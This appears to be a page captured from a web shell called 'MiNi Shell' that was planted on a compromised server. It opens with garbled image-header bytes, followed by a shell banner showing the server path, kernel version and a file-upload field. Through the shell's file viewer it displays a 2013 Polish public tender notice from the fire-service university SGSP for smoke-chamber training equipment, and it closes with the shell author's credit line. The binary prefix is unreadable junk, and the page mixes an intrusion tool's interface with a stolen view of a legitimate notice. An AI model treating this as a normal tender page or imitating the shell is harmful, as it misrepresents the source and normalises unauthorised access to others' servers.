JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130124/33502-N-2013.html

<p class="kh_header"><b>Warszawa: Dostawa wraz z montażem i instalacją wyposażenia do stacjonarnego obiektu ćwiczebnego - komory dymowej, w tym:
część I: Urządzenia wydolnościowe: bieżnia i rower do ćwiczeń
część II: Wyposażenie medyczne
część III: Sprzęt komputerowy
część IV: Meble do pomieszczenia ratownika medycznego</b><br>
<b>Numer ogłoszenia: 33502 - 2013; data zamieszczenia: 24.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Główna Służby Pożarniczej , ul. Słowackiego 52/54, 01-629 Warszawa, woj. mazowieckie, tel. 022 5617624, faks 022 8330724.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sgsp.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wraz z montażem i instalacją wyposażenia do stacjonarnego obiektu ćwiczebnego - komory dymowej, w tym:
część I: Urządzenia wydolnościowe: bieżnia i rower do ćwiczeń
część II: Wyposażenie medyczne
część III: Sprzęt komputerowy
część IV: Meble do pomieszczenia ratownika medycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa do siedziby Zamawiającego i prezentacja (z wyłączeniem części IV w zakresie prezentacji) funkcjonowania nowego wyposażenia do stacjonarnego obiektu ćwiczebnego - komory dymowej. 

Zamówienie zostało podzielone wg poniższych części:
Część I: Profesjonalne urządzenia wydolnościowe typu: bieżnia, rower do ćwiczeń, 
Część II: Wyposażenie medyczne typu: zestaw PSP R2  w torbie z kpl. szyn Kramera w osobnej torbie i respiratorem transportowym, defiblyratorem AED oraz waga ze       wzrostomierzem wraz z niezbędnym oprogramowaniem i drukarką.
Część III: Sprzęt komputerowy typu: komputer przenośny z niezbędnym oprogramowaniem i drukarką.
Część IV: Meble do pomieszczenia ratownika medycznego typu: szafa medyczna, krzesło obrotowe, taboret tapicerowany, biurko lekarskie.  

W zakres przedmiotu zamówienia (w ramach ceny ofertowej) , w części I, i IV wchodzi także przeniesienie i instalacja/montaż w późniejszym terminie dostarczonego przedmiotu zamówienia we wskazanym docelowym miejscu, tj. pomieszczeniach stacjonarnego obiektu ćwiczebnego - komory dymowej,  w terminie do 2 dni od telefonicznego wezwania Zamawiającego 

Szczegółowe wymagania dotyczące ww. wyposażenia określone zostały w rozdziale II Opis szczegółowy przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.40.00.00-2, 33.19.00.00-8, 30.21.21.00-6, 30.23.21.10-8, 33.19.20.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1) Wadium zobowiązani są wnieść Wykonawcy składający ofertę na część I lub i II postępowania tj. urządzenia wydolnościowe i wyposażenie medyczne, w wysokości:

Wysokość wadium:
cz. I: 1500,00 PLN brutto (słownie: tysiąc pięćset złotych),
cz. II: 800,00 PLN brutto (słownie: osiemset złotych).

Na pozostałe części zamówienia nie wymaga się wniesienia wadium.

2) Okres ważności wadium musi obejmować cały okres związania ofertą.

3) Forma wadium.

Wadium może być wniesione w następujących formach:
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.)

4) W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja musi być gwarancją nieodwołalną, bezwarunkową i płatną na pierwsze pisemne żądanie Zamawiającego, sporządzoną zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
b) określenie wierzytelności, która ma być zabezpieczona gwarancją,
c) kwotę gwarancji,
d) termin ważności gwarancji,
e) zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
- odmówił podpisania umowy na warunkach określonych w ofercie, lub
- nie wniósł zabezpieczenia należytego wykonania umowy, lub
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
oraz przed wyborem oferty najkorzystniejszej
- jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp, nie złożył dokumentów lub oświadczeń , o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni, iż wynika to z przyczyn nieleżących po jego stronie.

5) Miejsce i sposób wniesienia wadium.

Wadium wnoszone w pieniądzu należy wpłacić na następujący rachunek Zamawiającego:

nr 68 1030 1508 0000 0008 1630 1084  w BH

W przypadku wnoszenia wadium w innej formie niż pieniężnej, Wykonawca winien złożyć w ofercie kserokopię dokumentu poświadczoną za zgodność z oryginałem przez Wykonawcę, przy czym oryginał dokumentu należy złożyć w oddzielnej kopercie wraz z ofertą.

W przypadku przelewu wadium na konto Zamawiającego, do oferty należy dołączyć kserokopię przelewu potwierdzoną za zgodność z oryginałem.

Za skutecznie wniesione wadium w pieniądzu, Zamawiający uzna wadium, które w oznaczonym terminie tj. terminie złożenia oferty znajduje się na rachunku Zamawiającego.

6) Termin wniesienia wadium.

- Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
- Wykonawca zostanie wykluczony z niniejszego postępowania, jeżeli jego oferta przed upływem terminu składania ofert nie zostanie zabezpieczona wadium w wymaganej wysokości i w wybranej formie spośród możliwych wyżej wymienionych.

7) Utrata wadium.

Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:

- odmówił podpisania umowy na warunkach określonych w ofercie, lub
- nie wniósł zabezpieczenia należytego wykonania umowy, lub
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
oraz przed wyborem oferty najkorzystniejszej
- jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp, nie złożył dokumentów lub oświadczeń , o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni, iż wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie wymaga się od wykonawców posiadania specjalnych uprawnień.
Wykonawcy - przedsiębiorcy, prowadzący działalność na podstawie ustawy z dnia 2 lipca 2004 r. o swobodzie działalności gospodarczej lub prowadzący działalność nie jako działalność gospodarcza zobowiązani są do podania w ofercie stosownych informacji o podstawach prowadzonej działalności zgodnej z przedmiotem zamówienia. 
Wg tych informacji zamawiający sprawdzi je we właściwych dostępnych rejestrach.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie, poza oświadczeniem którego treść zawarta jest w zał. nr 1 do SIWZ,   nie wymaga się od Wykonawcy spełnienia innych warunków.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie, poza oświadczeniem którego treść zawarta jest w zał. nr 1 do SIWZ,   nie wymaga się od Wykonawcy spełnienia innych warunków.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie, poza oświadczeniem którego treść zawarta jest w zał. nr 1 do SIWZ,   nie wymaga się od Wykonawcy spełnienia innych warunków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie, poza oświadczeniem którego treść zawarta jest w zał. nr 1 do SIWZ,  nie wymaga się od Wykonawcy spełnienia innych warunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Dowód wniesienia wadium.

Oferta składana w trybie art. 23 ust. 1 Pzp.
1) W przypadku wspólnego ubiegania się o udzielenie zamówienia, wykonawcy ubiegający się o udzielenie zamówienia, zobowiązani są, zgodnie z art. 23 ust. 2 Pzp, do ustanowienia pełnomocnika zgodnie i w zakresie określonym w art. 23 ust. 2 Pzp odpowiednio do:
- reprezentowania w postępowaniu o udzielenie zamówienia (złożenie oferty wspólnej z imiennym wskazaniem wszystkich wykonawców składających ofertę oraz podejmowaniem innych czynności wynikających z procedury postępowania),
- reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
W takim przypadku wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.

W takich przypadkach jednym z dokumentów składających się na ofertę powinno być poprawnie udzielone Pełnomocnictwo.

2) W przypadku wybrania oferty wspólnej zamawiający wymaga przedłożenia, przed zawarciem umowy o udzielenie zamówienia, umowy regulującej współpracę tych wykonawców w zakresie dotyczącym wykonania przedmiotu zamówienia.
Nie dopuszcza się składania umowy przedwstępnej regulującej współpracę lub umowy zawartej pod warunkiem zawieszenia.
3) W przypadku wybrania oferty złożonej przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, wykonawcami zamówienia są wszyscy uczestnicy zawartego porozumienia o udzielenie zamówienia (wykonawca zbiorowy). Wykonawcy ponoszą, zgodnie z art. 141 Pzp solidarną odpowiedzialność za wykonanie umowy.
4) W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców spełnienie warunków udziału w postępowaniu będą oceniane łącznie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmianę postanowień zawartej umowy wyłącznie w zakresie korekty wartości przedmiotu umowy brutto o której mowa w §2 ust. 1, w przypadku ustawowej zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sgsp.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie SGSP w Warszawie ul. Słowackiego 52/54  Dział Zamówień Publicznych pok. 323 - wejście od ul. Siemiradzkiego 2 (obiekt 02)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.02.2013 godzina 10:00, miejsce: W siedzibie SGSP w Warszawie ul. Słowackiego 52/54  KANCELARIA OGÓLNA pok. 102 - wejście od ul. Siemiradzkiego 2 (obiekt 02)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Urządzenia wydolnościowe: bieżnia i rower do ćwiczeń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Profesjonalne urządzenia wydolnościowe typu: bieżnia i rower do ćwiczeń.
Wymagane min. parametry:

1. BIEŻNIA PROFESJONALNA - 1 kpl.
Wybór funkcji z menu przez programator dotykowy: przejście na sterowanie
ręczne, medyczny przebieg testu, programy stałe, programy własne, automatyka pulsu.
Wyświetlacz pokazujący następujące parametry: 
- kalorie, 
- dystans, 
- czas, 
- prędkość,
- kalorie/godz. 
- tempo, 
- wznios, 
- aktualny puls.

Parametry techniczne:
prędkość. 0,2- 20 km / h. z regulacją co 0,1 km /h,
wznios minimum: 0 - 20 % z płynną regulacją
zasilanie 230V/50Hz,
pas bieżni min. 150 x 50 cm.
nośność bieżni minimum 170 kg

Pomiar pulsu przez sensory dotykowe  umieszczone w poręczach i pasek napiersiowy.
Klucz bezpieczeństwa stanowiący awaryjny system zatrzymywania bieżni.
Panel sterujący bezpośrednio przy urządzeniu, pozwalający na niezależne wykorzystanie
urządzenia bez konieczności załączania pulpitu sterującego. 
Oprogramowanie i opis klawiatury w j. polskim - tj. komunikaty komputera w języku
polskim.

2. ROWER DO ĆWICZEŃ - 1 kpl
 -   Panel sterujący bezpośrednio przy urządzeniu , pozwalający na niezależne wykorzystanie
      urządzenia bez konieczności załączania pulpitu sterującego, 
- Maksymalna waga użytkownika 170 kg.
- Rowerek bez zasilania elektrycznego - własny generator.
- Regulacja siedzenia (min. w pionie i w poziomie),
- Oprogramowanie i opis klawiatury w j. polskim - tj. komunikaty komputera w języku
      polskim.
-     Możliwość regulacji mocy obciążenia (W) oraz utrzymania stałej mocy niezależnie od        prędkości pedałowania

FUNKCJE KOMPUTERA:
Wyświetlacz pokazujący następujące parametry: 
- kalorie, 
- dystans, 
- czas, 
- tempo
- kalorie na godz., 
- prędkość, 
- poziom obciążenia,
- Funkcja doradcy kardio; w osobnych oknach pokazywany puls aktualny oraz puls
optymalny (docelowy) dla treningu kardio i treningu odchudzanie.

Możliwość wyboru kilku programów min. spalania kalorii, trening interwałowy itd.
Możliwość przeprowadzenia testu wydolnościowego.
Pomiar pulsu przez sensory dotykowe w umieszczone w poręczach, lub pasek napiersiowy,
Uchwyty na bidon.

Wymagania dodatkowe: 
- Wykonawca wraz z dostawą ww. wyposażenia zobowiązany jest dostarczyć: karty katalogowe, instrukcje użytkowania i karty gwarancyjne - w języku polskim.
- Minimalny okres gwarancji na ww. urządzenia: min. 36 m-cy.

W zakres przedmiotu zamówienia (w ramach ceny ofertowej) , w części I wchodzi także przeniesienie i instalacja/montaż w późniejszym terminie dostarczonego przedmiotu zamówienia we wskazanym docelowym miejscu, tj. pomieszczeniach stacjonarnego obiektu ćwiczebnego - komory dymowej,  w terminie do 2 dni od telefonicznego wezwania Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.40.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wyposażenie medyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wyposażenie medyczne typu: 
1. Zestaw PSP R2  w torbie z kpl. szyn Kramera w osobnej torbie, defiblyratorem AED, ciśnieniomierzem stacjonarnym i respiratorem transportowym - 1 kpl. 
2. Waga ze wzrostomierzem wraz z niezbędnym oprogramowaniem i drukarką - 1 kpl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sprzęt komputerowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sprzęt komputerowy typu: komputer przenośny z niezbędnym oprogramowaniem i drukarką - 1 kpl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 30.23.21.10-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Meble do pomieszczenia ratownika medycznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Meble do pomieszczenia ratownika medycznego typu: szafa medyczna, taboret, biurko lekarskie.  

1.  Szafa medyczna - 1 szt.
- Szafa jednodrzwiowa, wykonana z blachy. 
- Przeszklenie drzwi ze szkła hartowanego. 
- Zamykana zamkiem ryglującym w trzech punktach z uchwytem klamkowym.
- Wyposażona  w 4 półki wykonane ze szkła hartowanego o maksymalnym udźwigu 25 kg.
- Malowana  farbami proszkowymi (epoksydowo-poliestrowymi) - kolor biały lub szary.

Przybliżone wymiary zewnętrzne szafy:
Szerokość: 600 mm
Głębokość: 420 mm
Wysokość: 1800 mm
2. Krzesło obrotowe - 2 szt..
-    tapicerowane siedzisko i oparcie - kolor szary
- regulacja wysokości siedziska
- regulacja pochylenia i wysokości oparcia
- podłokietniki
- na kółkach obrotowych

3.Taboret z tapicerowanym siedziskiem - 1 szt..
 
- szerokość: 410mm
- wysokość: 475mm
- masa:  maks. 3,00 kg 
- stelaż w kolorze czarnym (w standardzie)
  
4. Biurko lekarskie - 1 szt.. 
 
- wymiary (wys. x szer. x gł.): 740-770x1200x600 
- Kolor: biały lub szary (jak szafa - pkt. 1)
- Konstrukcja metalowa
- W kpl. kontenerek biurka posiadający min. dwie szuflady dostosowane do formatów na karty chorób pacjentów. 

W zakres przedmiotu zamówienia (w ramach ceny ofertowej) , w części IV wchodzi także przeniesienie i montaż w późniejszym terminie dostarczonego przedmiotu zamówienia we wskazanym docelowym miejscu, tj. pomieszczeniach stacjonarnego obiektu ćwiczebnego - komory dymowej,  w terminie do 2 dni od telefonicznego wezwania Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com